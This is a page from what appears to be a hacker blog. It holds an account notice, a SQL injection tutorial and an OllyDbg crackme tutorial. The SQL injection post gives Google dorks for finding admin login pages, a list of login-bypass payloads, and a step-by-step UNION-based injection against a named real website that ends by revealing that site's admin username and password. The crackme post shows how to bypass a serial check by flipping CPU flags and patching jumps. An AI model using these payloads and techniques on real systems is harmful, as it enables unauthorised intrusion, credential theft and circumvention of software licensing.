ExPLOiTInc Bad News

Category : 0

Hello All,

Joe Root ExPLOiTInc Old Yahoo ID Disable By Yahoo.com

ExPLOiTInc@Yahoo.com <<=== Account Close By Yahoo.com

j0er00t_00x0@Yahoo.com <<=== New Account Add Me

Admin of Hack2World :- hack2wwworld.blogspot.com

Admin Of Hack2World :-hack2www.blogspot.com

Admin Of ExPLOiTInc :- Exploitinc.blogspot.com

MY SQL INJECTION COMPLETE TUTORIAL :)

Category : , 0

Hello every one .
I am going to share with one of the best of my tutorials here .

Now Let's begin!!

Sql injection (aka Sql Injection or Structured Query Language Injection) is the first step in the entry to exploiting or hacking websites. It is easily done and it is a great starting off point. Unfortunately most sqli tutorials suck, so that is why I am writing this one. Sqli is just basically injecting queries into a database or using queries to get authorization bypass as an admin.

Things you should know :
Data is in the columns and the columns are in tables and the tables are in the database .
Just remember that so you understand the rest .

PART 1
Bypassing admin log in
Gaining auth bypass on an admin account.

Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection. 
here is the best:



Code:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now what to do once we get to our site.
the site should look something like this :
ADMIN USERNAME :
PASSWORD :

so what we do here is in the username we always type "Admin"
and for our password we type our sql injection

here is a list of sql injections



Code:
' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'

So your input should look like this

username:Admin
password:'or'1'='1
that will confuse the site and give you authorisation to enter as admin

If the site is vulnerable than you are in Biggrin

PART 2
Finding Sites to Inject

Finding SQLI Vulnerable sits is extremely easy all you need to do is some googling. The first thing you need to do are find some dorks. 
Download SQLI dorks list from here : http://zyan.me/UVkJP

PS:I didn't put them in the thread because i passed count limit...
Pick one of those dorks and add inurl: before it (If they do not already have it) and then copy and paste it into google. Pick one of the sites off google and go to it.
For example the url of the page you are on may look like this :



Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10

To check that it is vulnerable all you have to do is add a '

So our link should look like that :

Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=10'

Press enter and you get some kind of error. The errors will vary...

Our page should look like that :

Spoiler 
[Image: vulnerrorcopy.jpg]

After you find your vulnerable site the first step you need to take is to find the number of columns. The easiest way to do this is writing "order by " column number and we add "--" after the number.
Our link should look like that :



Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 15--

If you get an error that means you should lower the number of columns .
Let's try 10.



Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 10--

The page opened normally that means the number of columns is between 10 and 14.
We try now 11.



Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 11--

The page opened normally too...
Let's try 12.



Quote:http://www.leadacidbatteryinfo.org/newsdetail.php?id=10 order by 12--

We got error . That means the columns number is 11 because we got error on 12 and 11 opened normally .

Finding Accessible Columns 
Now that we have the number of columns we need to get the column numbers that we can grab information from.
We can do that by adding a "-" before the "10" replacing the " order by # " with "union all select " and columns number
Our link should look like that :



Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,8,9,10,11--

We should get numbers .

Our page should look like that :]

Spoiler 
[Image: vulncolumnscopy.jpg]

For the end part of the url, (1,2,3,4,5,6,7,8,9,10,11) You put the number of columns you found in the first step. Since I found that the site I was testing had 11 columns, I put 1,2,3,4,5,6,7,8,9,10,11--
These numbers are the colum numbers we can get information from. We will replace them later with something else so write them down if you want.

Getting Database Version
We found that column 8 , 3 , 4 and 5 are vulnerable so we will use them to get the database version .
Why Do We Do That?
If database is under 5 that means we will have to guess the tables names
To do that we need to replace one of the vulnerable columns by "@@verion"
Let's take column 8.
Our link should look like that :



Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,@@version,9,10,11--

The page should look like that :]

Spoiler 
Image has been scaled down 12% (907x681). Click this bar to view original image (1024x768). Click image to open in new window.
Image has been scaled down 12% (907x681). Click this bar to view original image (1024x768). Click image to open in new window.
[Image: dbversioncopy.jpg]

In our case we got "5.0.77" its >5 so we can continue.

Now we need to get the table name we want to access :
To do it we need to replace "@@version" with "table_name" and add after the last columns number "from information_schema.tables" and add the "--" in the end .
Link should be like that:



Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--

Page should look like that :]

Spoiler 
[Image: tablenamescopy.jpg]

Now we will search the table we want to access .
We should fine something with admin on it and in our case it's tbladmin


Spoiler 
[Image: tblhcopy.jpg]

Now we need to get the ASCII value of "tbladmin".
What is ASCII?
http://en.wikipedia.org/wiki/ASCII_value
Now to get the ASCII value of "tbladmin" go to that site : http://getyourwebsitehere.com/jswb/text_to_ascii.html


Spoiler 
[Image: acsii1copy.jpg]

Now enter in first box the table name wich is "tbladmin" in our case and click convert to ASCII.
You will get as value that :



Code:
tbladmin

Now remove the characters as & # ; and we add a comma "," between each number .
It should be like that:



Code:
116,98,108,97,100,109,105,110

Spoiler 
[Image: acsii2copy.jpg]

Now we replace in the URL the "table_name" to "column_name" and change "information_schema.tables" to "information_schema.columns and add "where table_name=char(ASCII value)--
in our case at place of (ASCII value) we put (116,98,108,97,100,109,105,110)--
Our URL should look like that :



Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--

Our page should be like that:


Spoiler 
[Image: columnsmcopy.jpg]

Now we search for the columns named "username" and "password" or something like that .
In our case it is "username" and "password".
Now we can delete most of the URL .
Remove everything after the 11 and add : "from tbladmin" And replace "column_name" with "concat(username,0x3a,password)
0x3a is the ASCII value of a : so we can separate the username from the password.
Our URL should look like that:

 

Quote:http://www.leadacidbatteryinfo.org/newsd...php?id=-10 union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin

Our page should look like that :


Spoiler 
[Image: adminandpass.jpg]

And you're done the username is ishir and password ishir123
Some times password is encrypted with Hashes .
Use my HASH detector to know what it is and decrypt online.


And We're Done !

Our First (Sort Of) Crack : Tutorial 5

Category : 0


Introduction

In this tutorial we will be finishing up some last minute Olly things as we review a crackme. Well, sort of a crackme. It’s really just the program we used before but changed to ask for a serial number and displays either a good message if you get the serial right, or bad message if you get it wrong. I chose to do it this way, as opposed to jumping into a completely different crackme, because I want you to be able to focus on the serial checking routine, and not get bogged down in all off the other superfluous code. Next tutorial we will be going over a real crackme (I promise).
In this tutorial, all you need is OllyDBG (either my version or the original), and a copy of my revised crackme, which, by the way, I am calling the “First Assembly Kracking Engine”, or F.A.K.E. It is included in the files download for this tut. (and yes, Gdogg, I know kracking does not start with a ‘K’ :)
You can download the files and PDF version of this tutorial on the tutorials page.
Let’s get started.
Olly Main Screen
If you load up the FAKE.exe in Olly, you will notice that the first page of code is the same as our last program we studied.
Deja Vu
Let’s run the app, as knowing how it works is vitally important:
Running the Crackme
Click on register and the following dialog appears:
Crackme
I entered a serial:
Serial Entered
Then, after clicking the Enter Serial I get the following very bad message:
Denied
DANG IT! And I tried so hard!!!!! :)
Now, I want to show you the first method every new reverse engineer learns in order to find the registry checking routine:

Searching For All Text Strings

Let me first say that many ‘seasoned’ reversers (read crackers) out there think that this method should be rarely used. This is because it is a very obvious method, and because of that, anyone trying to protect their program from reverse engineering will disable it. Face it, any program out there that has been packed, protected, encrypted, or changed because the author of the program is not a complete knucklehead will block use the ‘search for strings’ method by encrypting the strings. THAT BEING SAID, I find that there are a lot of knucklehead authors out there, so don’t tell any ‘seasoned’ crackers out there, but it’s one of the first things I check. (ps. It’s also one of the first things the ‘seasoned’ crackers check too :)
Basically, this method involves asking Olly to search the memory space of your program, searching for anything that looks like an ASCII or Unicode text string. Usually, it will be immediately apparent whether this technique worked or not; there will either be a plethora of text strings, many of which look very juicy (like “Thank you for registering!!!”), or there will be very few text strings, many of which look like this: “F@7=”.
Knowing whether there are legitimate text strings in a binary can give you some valuable information itself. such as whether the binary has been packed or protected in some way, whether it’s perhaps a malicious binary (after all, having the string “Send all user’s passwords to www.badguys.com” wouldn’t be very responsible virus writing), and even if the binary was written in a more rarely used language.
Let’s see how we do this. Right-click in the assembly window and choose “Serach For”->”All Referenced Text Strings”:
Search for Strings
And Olly will search the program’s memory space and display the Text String Window:
Text Strings
Hmmm, this looks interesting:) Keep in mind that this list is REALLY short as this app is really tiny. Normally, there could be thousands of entries here. Anyway, do you notice what I notice:
The good message
Looks very promising. Let’s jump to the code there and see what we see: double click on the “That serial is correct!!!!!” line and Olly will disassemble that area for us in the disassembly window:
Jump to good message
It is now time for me to introduce the second rule in
R4ndom’s Essential Truths About Reversing Data:

#2 Most protection schemes can be overcome by changing a simple jump instruction to jump to ‘good’ code instead of ‘bad’ code.


What this means is that almost every time before a bad message is displayed, there is some sort of check (Are we registered? Was the entered reg code correct? Is the time trial over?…) and there will be a jump after this compare that will either jump to the good message or the bad message depending on the outcome of the compare.
Let’s look for ourselves…Starting at the good message “This serial is correct!!!!” at address 401222, start scrolling up the list, looking for jump statements, especially jump statements that have some sort of compare (or call) right before them. If it’s a call, you can probably guess that the compare is inside the call…In our example, the first jump is a JNZ at address 401220. I have added an arrow to show you where this jump will go if it is used:
First JNZ
Hmmm. Notice that it jumps right past the message we want and right to the message we don’t want :(BUT, notice that right above this JNZ instruction is a CMP instruction :) That means this is a potential point that determines whether Olly displays the message we want or don’t want. Let’s scroll up further:
Jumps over Good message
There is another CMP/JNZ pair at 401212, and finally, a last one at 401207. If you look closely you will see that all three jumps jump past our good message and jump to the bad one. Logically, this means that three things are checked, and if any of them are triggered, we will hit the bad message. But, what happens if we don’t jump on any of these three jumps? Well, you can see that we will “fall through” to the good message. So, what this really means is we have to keep those jumps from jumping so that the program will keep “falling through” until it reaches our good message :)
Let’s run the app to see what it does, but first I want to show you:

How To Place A Comment

Comments are very useful, especially when you start getting into very intricate code. Code is already pretty hard to read, but with comments, we can remind ourselves of very important information. Here’s what we’re gonna do; we’re gonna set a comment on each of the JNZ instructions to remind ourselves what needs to happen.
In order to place a comment, either double click on the line you want to place the comment in the last column (where Olly has placed the “This is the correct serial!!!!” as well as other comments) or you can simply highlight the line you wish to place a comment and hit the “;” key. So highlight address 40120A, hit the semi-colon key and type “We do NOT want to jump here!”. Now, do the same thing, with the same comment, at addresses 401215 and 401220. This will place a comment on each of the JNZ instruction:
Placing Comments
Now, let’s set a breakpoint at address 401201 (or somewhere near here as it’s before our jump instructions):
Place breakpoint
and let’s run the program. Click “Register” on the crackme, enter a serial, and hit “Enter Serial”. Olly will now pause at our breakpoint:
Place breakpoint
Now, the first thing we notice is the line we stopped on:
MOV EBX, DWORD PTR DS:[403078]
From our last tutorial, we now know how to view the memory contents at this memory location- right-click that instruction and choose “Follow in Dump”->”Memory Address”. We then see that location in Olly’s dump window:
Dump Window
well, well, well. This just happens to be the serial number I entered. So, from this instruction, we now know that the first 4 bytes (since EAX is a 32-bit register) are loaded into EBX, which in this case are 31 32 31 32 which in ASCII is “1212″. Hit F8 and let’s check EBX:
Register Window
If you want to see the actual ASCII characters in EBX, you can double click on the EBX register and it will show you the data in a couple of different formats, one of which is ASCII:
View Register Window
*For later use, remember this is also a way to change the register ‘on the fly’ if you want to experiment with different values in different registers…
I guess even though you already know this from reading your assembly language book (I mean, come on! I even put one up in the tools section!!!), that I don’t need to go over this, but just for a refresher I will explain…

Little Endian Order

(or at least the least you need to know about it)
Processors store data differently in memory, depending on the architecture of the processor. There are two types of ways to store data in memory; one is called Big-Endian and the other is Little-Endian. Intel uses Little-endian, so we must get used to this or it will really screw you up. Here is an example: Say you have the address 7E04F172 (which is a 4-byte, 32-bit number). When we split this up in to bytes you get 7E, 04, F1, 72. Now, one would think that when storing these bytes into memory (let’s say at location 1000) it would look like this:
1000::7E
1001::04
1002::F1
1003::72
as any rational minded person would. But since the developers at Intel are so much smarter than us mere mortals, they decided to store it in the much more logical way:
1000::72
1001::F1
1002::04
1003::7E
The first example above is Big-Endian, meaning the biggest end of the number (in decimal order) is stored first in memory. Since 7E000000 is bigger than 040000, the first byte is stored in the first location, the second in the second and so on. The second (obviously much smarter way) example is called Little-Endian, meaning store the smallest byte (in this case byte #4) first, followed by the third, second first, in that order in memory. Since 72 is smaller than F100, that will be stored first.
The true genius of using LittleEndian as opposed to it’s bigger brother really shines when you start viewing memory side to side. In Big-Endian, the number 7E04F172 lookes like this:
7E04F172
which is obviously very confusing. Thank god that, with the help of Little-Endian, that same number 7E04F172 looks far more logical as:
72F1047E
What, you say? That’s just plain stupid- obviously the Big-Endian way makes far more sense, but then again, you are not a demi-god developer at Intel, so you do not even possess the brain power to begin to understand why this is FAR SUPERIOR. Anyway, (most) sarcasm aside, what this means is that when you look at code, both on disk and in memory, you must reverse all 4 bytes in a 4-byte number. Of course this is made even worse that Olly SOMETIMES does this for you, as you can see in the next picture:
Endianness
That’s all I’m going to say about this for now, but for a while I will point out the Endianneses(es)ess to you.
Now, back to our register window:
View Register Window
You will notice that the hexadecimal representation is in Little-Endian order (it should be 31323132) and that the Char(acters) are backward, as my serial started with 1212, not 2121. Trust me, you will get used to this.
Let’s now move on to the next instruction:
CMP BL, 61
This is obviously a compare statement, comparing BL, which is the first byte in the EBX register (RTF(asm)M), with the value 61 (hex). We don’t really have a clue what this means (yet) so lets step over it. Finally we arrive at the first of our JNZ instructions:
JNZ SHORT FAKE.401236
Which as we recall, since we can read our comments we made earlier, that we DO NOT want to make this jump. I will remind you that JNZ stands for Jump if Not Zero, so these two lines basically mean “if the contents of BL are not equal to 61h, jump to the bad message”. Well, we can clearly see in the EBX register that the far right byte (BL) is not 61h, but instead is 31h, so already we’re stuck and we’re going to take this jump that we so much did not want to :(
But wait! Olly is a ‘dynamic’ debugger so we should be able to dynamic that jump! Well, since you probably read an entire chapter on flags in your assembly language book, I am not going to go over:

CPU Flags

We briefly went over flags in an earlier tutorial, and I’m really not going to go into detail on them as I’m sure the index of your assembly book has an “F” section, but I will say that flags are the way the processor can know what the outcome of certain instructions are. There are a significant amount of instructions in the Intel library that affect flags, but the most important (at least for reversing) are “compare” instructions. Basically, the CPU performs a compare on two items, sets certain flags based on their relative properties (are they the same? is one bigger? is one negative?) and then performs jump statements based on these flags. This is all just a very fancy way of saying IF THEN statements. For example, in a high-level language you may have a line like this:
if( serialNumber == 3 )
    dontShowNag();
else
    showNag();
in pseudo-assembly, this same set of instructions would be something like this:

compare serialNumber with 3
   jump (if they are equal) to dontShowNag();
   jump to showNag();
and in real assembly may look like this:
MOV EAX, addressOfSerialNumber CMP EAX, 3 JE addressOfDontShowNag JMP adressOfShowNag
First, EAX is loaded with our serial number. Next it is compared with “3″. If it is equal to 3 we jump to dontShowNag(). If it is not equal to 3, we pass the JE (Jump if Equal) instruction and hit the JMP (JuMP) instruction, which automatically jumps to showNag(), regardless of any flags.
The important flags (for us) are the ZERO flag and the CARRY flag, shown as “Z” and “C” in Olly. Basically, by changing one of these two flags, we can prevent (or force) any jump in the program, as we’ll see right now:
Jumping
On the line we are paused at (the first JNZ) we can see that Olly is going to take this jump by noticing that the jump arrow is red. If we were not going to take the jump, this line would be grey. ***If you are not using my version of Olly, the arrows will not be there, in which case you can look between the disassembly window and the dump window and Olly will tell you whether the jump will be taken or not. In our case, it shows this:
Jump Is Taken
Now, we know Olly will take this jump unless we intercede, so let’s do that. Go over to the register window and look for the “Z” flag:
Zero Flag
Notice that it is a zero. That means that the compare between 61h and the contents of BL (31h) are zero, or false, so they are not the same. We can now see why the Jump if Not Zero instruction will jump, because right now, the zero flag is not set, so it is “not zero”. Now, double click on the zero next to the zero flag and it should change to a 1: Change the zero flag
and now notice that the arrow is grey (and that Olly says the jump is NOT taken):
Jump is not taken
We have changed Olly’s flags, and at the same time, we have changed the programs behaviour :) Go ahead, big shot, and hit F8 (you’ve earned it) and we should not take the jump :O We are now entering what looks like the same code segment, except this time EBX is being loaded with the second character of our serial, and it is being compared with 62h instead of 61h:
Next compare
We know that the second digit of our serial is not 62h and now we know what to do- F8 until you get to the JNZ statement, double click the zero flag, and keep going !!! You’ll pass right past the JNZ statement. We are almost there! The last section compares the third digit of our serial with 63h. The third digit of our serial is 31h, so the jump would normally be taken. Go ahead, you know what to do. We will then land on address 401222, one statement past the third jump:
Past the last jumpYou’re heart should be pumping, because I think we both know what comes next. There are no more jumps between us and salvation, so either step over the next couple instructions (if you like to draw out the suspense) or just run the app (if you’re like me and can’t stand suspense) and we have reached the pearly gates:
The Pearly Gates

Homework

I know you weren’t expecting this, as this tutorial has already been so exciting, but I am going to end with two things. The first is another
R4ndom’s Essential Truths About Reversing Data:

#3 You will not learn reverse engineering by just reading tutorials. You MUST experiment on your own, and you must do a great deal of it.

and in light of this new rule, I am leaving you with some homework. You mission, should you accept it, is to find out what the serial number is. This means, what is the input that you must enter into the serial box for none of the JNZs to jump? You know you have found it when, after entering the correct serial, you do not have to adjust the app in any way, it will simply show “That Serial is Correct!!!!!!!”

Powered by Blogger.